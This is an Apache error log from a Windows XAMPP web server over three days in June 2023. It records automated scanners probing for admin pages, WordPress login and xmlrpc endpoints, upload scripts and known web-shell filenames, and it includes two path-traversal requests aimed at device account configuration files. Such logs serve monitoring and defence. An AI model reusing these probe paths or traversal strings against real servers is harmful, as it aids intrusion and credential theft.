[Mon Jun 26 01:36:10.522528 2023] [cgi:error] [pid 24848:tid 3556] [client 172.104.137.47:58038] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/home.asp
[Mon Jun 26 01:36:11.132880 2023] [cgi:error] [pid 24848:tid 3216] [client 172.104.137.47:58084] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/main.cgi
[Mon Jun 26 01:36:11.285224 2023] [cgi:error] [pid 24848:tid 3216] [client 172.104.137.47:58094] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/admin.asp
[Mon Jun 26 01:36:11.439185 2023] [cgi:error] [pid 24848:tid 3216] [client 172.104.137.47:58102] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/index.cgi
[Mon Jun 26 01:36:12.363316 2023] [cgi:error] [pid 24848:tid 3216] [client 172.104.137.47:58144] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/default.asp
[Mon Jun 26 01:36:13.724017 2023] [cgi:error] [pid 24848:tid 3216] [client 172.104.137.47:58212] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/home.cgi
[Mon Jun 26 01:36:13.724989 2023] [authz_core:error] [pid 24848:tid 3484] [client 172.104.137.47:58216] AH01630: client denied by server configuration: C:/xampp/htdocs/default/server-status
[Mon Jun 26 01:36:14.030147 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:58236] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/base.pl
[Mon Jun 26 01:36:14.181630 2023] [php:error] [pid 24848:tid 3484] [client 172.104.137.47:58238] script 'C:/xampp/htdocs/default/base.php' not found or unable to stat
[Mon Jun 26 01:36:15.673239 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:58328] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/admin.cgi
[Mon Jun 26 01:36:15.824307 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:58342] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/localstart.asp
[Mon Jun 26 01:36:15.977920 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:58354] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/base.asp
[Mon Jun 26 01:36:16.131566 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:58366] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/base.cgi
[Mon Jun 26 01:36:17.347211 2023] [php:error] [pid 24848:tid 3484] [client 172.104.137.47:58444] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Mon Jun 26 01:36:18.251820 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:58490] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/main.asp
[Mon Jun 26 01:36:18.402884 2023] [php:error] [pid 24848:tid 3484] [client 172.104.137.47:40896] script 'C:/xampp/htdocs/default/admin.php' not found or unable to stat
[Mon Jun 26 01:36:18.555818 2023] [php:error] [pid 24848:tid 3484] [client 172.104.137.47:40900] script 'C:/xampp/htdocs/default/main.php' not found or unable to stat
[Mon Jun 26 01:36:19.162274 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:40944] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/main.pl
[Mon Jun 26 01:36:19.313873 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:40946] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/admin.pl
[Mon Jun 26 01:36:19.615801 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:40972] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/menu.cgi
[Mon Jun 26 01:36:20.069765 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:40998] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/default.cgi
[Mon Jun 26 01:36:21.126347 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41048] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/inicio.asp
[Mon Jun 26 01:36:21.276115 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41052] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/index.asp
[Mon Jun 26 01:36:21.580165 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41068] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/localstart.pl
[Mon Jun 26 01:36:21.881494 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41082] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/menu.asp
[Mon Jun 26 01:36:22.032253 2023] [php:error] [pid 24848:tid 3484] [client 172.104.137.47:41084] script 'C:/xampp/htdocs/default/home.php' not found or unable to stat
[Mon Jun 26 01:36:22.786961 2023] [php:error] [pid 24848:tid 3484] [client 172.104.137.47:41132] script 'C:/xampp/htdocs/default/localstart.php' not found or unable to stat
[Mon Jun 26 01:36:22.938338 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41142] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/default.pl
[Mon Jun 26 01:36:23.542050 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41196] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/indice.asp
[Mon Jun 26 01:36:24.146482 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41230] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/start.asp
[Mon Jun 26 01:36:24.298171 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41238] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/start.pl
[Mon Jun 26 01:36:24.897575 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41274] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/indice.pl
[Mon Jun 26 01:36:25.495472 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41306] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/index.pl
[Mon Jun 26 01:36:25.645469 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41318] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/home.pl
[Mon Jun 26 01:36:25.796156 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41334] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/start.cgi
[Mon Jun 26 01:36:25.946153 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41346] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/indice.cgi
[Mon Jun 26 01:36:26.096170 2023] [php:error] [pid 24848:tid 3484] [client 172.104.137.47:41348] script 'C:/xampp/htdocs/default/start.php' not found or unable to stat
[Mon Jun 26 01:36:26.394450 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41370] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/inicio.pl
[Mon Jun 26 01:36:26.543452 2023] [cgi:error] [pid 24848:tid 3484] [client 172.104.137.47:41384] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/menu.pl
[Mon Jun 26 02:19:13.559332 2023] [php:error] [pid 24848:tid 3484] [client 134.209.105.240:56256] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Jun 26 02:46:29.777769 2023] [php:error] [pid 24848:tid 3556] [client 85.215.176.85:51907] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Mon Jun 26 03:16:53.966119 2023] [php:error] [pid 24848:tid 3556] [client 68.178.200.242:44068] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Jun 26 05:01:06.700972 2023] [php:error] [pid 24848:tid 3528] [client 113.119.68.137:40494] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Jun 26 06:54:41.920622 2023] [php:error] [pid 24848:tid 3336] [client 64.227.172.170:51678] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Mon Jun 26 06:54:43.588497 2023] [php:error] [pid 24848:tid 3336] [client 64.227.172.170:51720] script 'C:/xampp/htdocs/default/1.php' not found or unable to stat
[Mon Jun 26 07:20:32.900710 2023] [php:error] [pid 24848:tid 3464] [client 216.128.179.119:59412] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Jun 26 09:41:12.272542 2023] [php:error] [pid 24848:tid 3556] [client 202.112.51.4:35090] script 'C:/xampp/htdocs/default/14a12607-dff1-498a-a5d8-585ca9c4bee6.php' not found or unable to stat
[Mon Jun 26 09:48:37.517737 2023] [php:error] [pid 24848:tid 3556] [client 85.215.176.85:60057] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Mon Jun 26 10:41:10.058055 2023] [php:error] [pid 24848:tid 3556] [client 54.147.22.218:44166] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Mon Jun 26 10:41:10.058055 2023] [php:error] [pid 24848:tid 3568] [client 54.147.22.218:44180] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Mon Jun 26 10:48:49.709457 2023] [php:error] [pid 24848:tid 3568] [client 50.63.3.108:42481] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Mon Jun 26 10:48:49.709457 2023] [php:error] [pid 24848:tid 3556] [client 50.63.3.108:42479] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Mon Jun 26 10:50:54.088929 2023] [php:error] [pid 24848:tid 3568] [client 173.201.180.210:45144] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Mon Jun 26 10:50:54.088929 2023] [php:error] [pid 24848:tid 3216] [client 173.201.180.210:45146] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Mon Jun 26 10:51:27.470087 2023] [php:error] [pid 24848:tid 3556] [client 173.201.180.210:50252] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Mon Jun 26 10:51:27.476092 2023] [php:error] [pid 24848:tid 3568] [client 173.201.180.210:50250] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Mon Jun 26 10:56:59.793340 2023] [php:error] [pid 24848:tid 3568] [client 90.156.169.17:21862] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Mon Jun 26 10:56:59.849322 2023] [php:error] [pid 24848:tid 3568] [client 90.156.169.17:21862] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Mon Jun 26 10:59:05.648102 2023] [php:error] [pid 24848:tid 3216] [client 54.147.22.218:41290] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Mon Jun 26 10:59:05.648102 2023] [php:error] [pid 24848:tid 3568] [client 54.147.22.218:41302] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Mon Jun 26 11:08:47.535373 2023] [php:error] [pid 24848:tid 3228] [client 68.178.220.89:63100] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Mon Jun 26 11:08:47.535373 2023] [php:error] [pid 24848:tid 3464] [client 68.178.220.89:63098] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Mon Jun 26 12:49:54.811620 2023] [php:error] [pid 24848:tid 3484] [client 146.190.233.15:58476] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Mon Jun 26 12:49:55.170436 2023] [php:error] [pid 24848:tid 3484] [client 146.190.233.15:58510] script 'C:/xampp/htdocs/default/1.php' not found or unable to stat
[Mon Jun 26 14:44:24.527347 2023] [php:error] [pid 24848:tid 3372] [client 85.215.176.85:49431] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Mon Jun 26 14:58:27.028275 2023] [php:error] [pid 24848:tid 3380] [client 85.215.176.85:59641] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Mon Jun 26 15:26:48.822303 2023] [php:error] [pid 24848:tid 3380] [client 59.11.214.75:57554] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://forum.fphosting.eu
[Mon Jun 26 15:26:50.077831 2023] [php:error] [pid 24848:tid 3380] [client 59.11.214.75:58084] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.forum.fphosting.eu
[Mon Jun 26 17:09:46.590621 2023] [php:error] [pid 24848:tid 3268] [client 173.201.180.210:57512] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Mon Jun 26 17:09:46.749625 2023] [php:error] [pid 24848:tid 3268] [client 173.201.180.210:57512] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Mon Jun 26 17:09:47.956427 2023] [php:error] [pid 24848:tid 3264] [client 72.167.67.188:39031] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Mon Jun 26 17:09:48.114286 2023] [php:error] [pid 24848:tid 3264] [client 72.167.67.188:39031] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Mon Jun 26 17:26:03.364211 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.389970 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.416953 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.444935 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.474961 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.500956 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.526450 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.557468 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.583804 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.611834 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.636843 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:26:03.661834 2023] [php:error] [pid 24848:tid 3484] [client 45.12.253.143:53352] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Jun 26 17:48:23.338703 2023] [php:error] [pid 24848:tid 3336] [client 134.122.7.10:48178] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://tv.fphosting.eu
[Mon Jun 26 17:48:23.814953 2023] [php:error] [pid 24848:tid 3336] [client 134.122.7.10:48222] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.tv.fphosting.eu
[Mon Jun 26 17:52:04.289671 2023] [php:error] [pid 24848:tid 3336] [client 194.169.175.35:52434] script 'C:/xampp/htdocs/default/repeater.php' not found or unable to stat
[Mon Jun 26 17:52:04.360535 2023] [php:error] [pid 24848:tid 3336] [client 194.169.175.35:62557] script 'C:/xampp/htdocs/default/xl2023.php' not found or unable to stat
[Mon Jun 26 17:52:05.323990 2023] [php:error] [pid 24848:tid 3336] [client 194.169.175.35:60775] script 'C:/xampp/htdocs/default/alfanew.php' not found or unable to stat
[Mon Jun 26 17:52:05.885767 2023] [php:error] [pid 24848:tid 3336] [client 194.169.175.35:57973] script 'C:/xampp/htdocs/default/wso112233.php' not found or unable to stat
[Mon Jun 26 17:52:06.057764 2023] [php:error] [pid 24848:tid 3336] [client 194.169.175.35:58373] script 'C:/xampp/htdocs/default/shell20211028.php' not found or unable to stat
[Mon Jun 26 17:52:06.392660 2023] [php:error] [pid 24848:tid 3336] [client 194.169.175.35:55148] script 'C:/xampp/htdocs/default/xleet-shell.php' not found or unable to stat
[Mon Jun 26 17:52:06.581452 2023] [php:error] [pid 24848:tid 3336] [client 194.169.175.35:55453] script 'C:/xampp/htdocs/default/xleet.php' not found or unable to stat
[Mon Jun 26 18:58:12.641821 2023] [php:error] [pid 24848:tid 3216] [client 185.100.85.25:60904] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Jun 27 00:17:33.143576 2023] [php:error] [pid 24848:tid 3204] [client 194.169.175.37:53086] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Tue Jun 27 01:36:18.819121 2023] [php:error] [pid 24848:tid 3204] [client 85.215.176.85:61813] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Tue Jun 27 02:00:11.069999 2023] [php:error] [pid 24848:tid 3464] [client 85.215.176.85:49662] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Tue Jun 27 06:38:19.651789 2023] [core:error] [pid 24848:tid 3372] [client 193.32.162.190:54786] AH10244: invalid URI path (/../../mnt/mtd/Config/Account1)
[Tue Jun 27 08:05:38.776805 2023] [core:error] [pid 24848:tid 3556] [client 193.32.162.190:52740] AH10244: invalid URI path (/../../mnt/mtd/Config/Account2)
[Tue Jun 27 13:00:53.194587 2023] [php:error] [pid 24848:tid 3380] [client 120.27.244.113:56177] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Tue Jun 27 13:00:53.422777 2023] [authz_core:error] [pid 24848:tid 3380] [client 120.27.244.113:56177] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/index.php
[Tue Jun 27 15:46:13.641546 2023] [php:error] [pid 24848:tid 3696] [client 34.147.154.41:61537] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Tue Jun 27 17:23:00.215433 2023] [php:error] [pid 24848:tid 3528] [client 142.4.22.16:50142] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Jun 27 18:02:26.639177 2023] [php:error] [pid 24848:tid 3372] [client 103.152.79.201:43788] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Jun 27 18:20:22.233163 2023] [php:error] [pid 24848:tid 3372] [client 111.90.150.171:46356] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Jun 27 18:27:31.954196 2023] [php:error] [pid 24848:tid 3216] [client 94.16.105.148:38226] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Jun 27 18:29:16.050498 2023] [php:error] [pid 24848:tid 3216] [client 77.238.122.196:34424] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Jun 27 18:36:34.770826 2023] [php:error] [pid 24848:tid 3372] [client 158.69.124.84:55176] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Jun 27 19:12:52.650860 2023] [authz_core:error] [pid 24848:tid 3320] [client 66.249.79.32:63791] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/index.php
[Tue Jun 27 20:22:04.669187 2023] [php:error] [pid 24848:tid 3188] [client 150.230.93.233:34042] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Jun 27 20:46:24.350739 2023] [php:error] [pid 24848:tid 3188] [client 165.22.242.68:40228] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Tue Jun 27 20:46:26.271119 2023] [php:error] [pid 24848:tid 3188] [client 165.22.242.68:40264] script 'C:/xampp/htdocs/default/1.php' not found or unable to stat
[Tue Jun 27 21:51:18.392760 2023] [php:error] [pid 24848:tid 3320] [client 178.128.81.140:38598] script 'C:/xampp/htdocs/default/phpinfo.php' not found or unable to stat
[Tue Jun 27 21:51:26.046870 2023] [php:error] [pid 24848:tid 3320] [client 178.128.81.140:42814] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Tue Jun 27 22:50:28.693962 2023] [php:error] [pid 24848:tid 3520] [client 37.59.254.146:34138] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Jun 27 23:09:00.747749 2023] [php:error] [pid 24848:tid 3320] [client 110.14.63.77:60492] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://server-32557.prod.hosts.ooklaserver.net
[Wed Jun 28 00:02:15.565136 2023] [php:error] [pid 24848:tid 3188] [client 39.101.185.186:39840] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Jun 28 00:13:08.192709 2023] [php:error] [pid 24848:tid 3520] [client 119.23.105.36:55308] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://payments.fphosting.eu
